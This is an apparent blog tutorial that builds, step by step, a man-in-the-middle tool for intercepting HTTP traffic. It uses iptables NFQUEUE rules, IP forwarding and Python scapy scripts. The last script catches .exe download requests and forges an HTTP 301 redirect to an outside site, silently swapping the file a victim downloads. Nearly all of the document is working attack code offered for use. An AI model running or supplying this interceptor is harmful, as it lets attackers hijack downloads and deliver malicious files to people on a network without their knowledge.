WRITING A FILE INTERCEPTOR/REPLACE

2 min read
0

# MODEFYING DATA IN HTTP-LAYER

MOTIVE:

  • EDIT REQUEST/RESPONSES
  • REPLACE DOWNLOAD REQUEST
  • INJECT CODE(HTML/JS)
The Port number used for HTTP is 80

#IP-table FOR-REMOTE-PC
-RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
-RUN: iptables -I INPUT -j NFQUEUE --queue-num 0

#IP-table FOR-LOCAL-PC
-RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0

#INTERNET
echo 1 > /proc/sys/net/ipv4/ip_forward

# CODE:.SHOW()/HTTP
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy

  5. def process_packet(packet):
  6.     scapy_packet = scapy.IP(packet.get_payload())

  8.     if scapy_packet.haslayer(scapy.Raw):
  9.         print(scapy_packet.show())


  12.     packet.accept()

  14. queue = netfilterqueue.NetfilterQueue()
  15. queue.bind(0, process_packet)
  16. queue.run()

# CODE: MODEFING-FOR REQUEST AND RESPONSES
show all data related to http-
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy

  5. def process_packet(packet):
  6.     scapy_packet = scapy.IP(packet.get_payload())

  8.     if scapy_packet.haslayer(scapy.Raw):

  10.         if scapy_packet[scapy.TCP].dport == 80:
  11.             print("HTTP Request")
  12.             print(scapy_packet.show())

  14.         elif scapy_packet[scapy.TCP].sport ==80:
  15.             print("HTTP Request")
  16.             print(scapy_packet.show())


  19.     packet.accept()

  21. queue = netfilterqueue.NetfilterQueue()
  22. queue.bind(0, process_packet)
  23. queue.run()


# CODE:MODEfy#2 [desire-extension]
can filter the .exe/- any -what u wish for/just replace
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy


  6. ack_list = []
  7. def process_packet(packet):
  8.     scapy_packet = scapy.IP(packet.get_payload())

  10.     if scapy_packet.haslayer(scapy.Raw):

  12.         if scapy_packet[scapy.TCP].dport == 80:
  13.             if ".exe" in scapy_packet[scapy.Raw].load:
  14.              print("[+] exe Request")
  15.              ack_list.append(scapy_packet[scapy.TCP].ack)
  16.              print(scapy_packet.show())

  18.         elif scapy_packet[scapy.TCP].sport ==80:
  19.             if scapy_packet[scapy.TCP].seq in ack_list:
  20.               ack_list.remove(scapy_packet[scapy.TCP].seq)
  21.               print("HTTP Request")
  22.               print(scapy_packet.show())


  25.     packet.accept()

  27. queue = netfilterqueue.NetfilterQueue()
  28. queue.bind(0, process_packet)
  29. queue.run()

# CODE:MODEfy#3
https://en.wikipedia.org/wiki/HTTP_301
changing the link by HTTP 301
  1. #!/usr/bin/env python
  2. import netfilterqueue
  3. import scapy.all as scapy


  6. ack_list = []
  7. def process_packet(packet):
  8.     scapy_packet = scapy.IP(packet.get_payload())

  10.     if scapy_packet.haslayer(scapy.Raw):

  12.         if scapy_packet[scapy.TCP].dport == 80:
  13.             if ".exe" in scapy_packet[scapy.Raw].load:
  14.              print("[+] exe Request")
  15.              ack_list.append(scapy_packet[scapy.TCP].ack)
  16.              print(scapy_packet.show())

  18.         elif scapy_packet[scapy.TCP].sport ==80:
  19.             if scapy_packet[scapy.TCP].seq in ack_list:
  20.               ack_list.remove(scapy_packet[scapy.TCP].seq)
  21.               print("[+]Replacing file")
  22.               scapy_packet[scapy.Raw].load = "HTTP/1.1 301 Moved Permanently\nLocation: https://www.epicmovies4me.ml\n\n"

  24.               del scapy_packet[scapy.IP].len
  25.               del scapy_packet[scapy.IP].chksum
  26.               del scapy_packet[scapy.TCP].chksum
  27.               packet.set_payload(str(scapy_packet))



  31.     packet.accept()

  33. queue = netfilterqueue.NetfilterQueue()
  34. queue.bind(0, process_packet)
  35. queue.run()








4.94 / 169 rates

Post a Comment

If you have any doubts, please let me know

Previous Post Next Post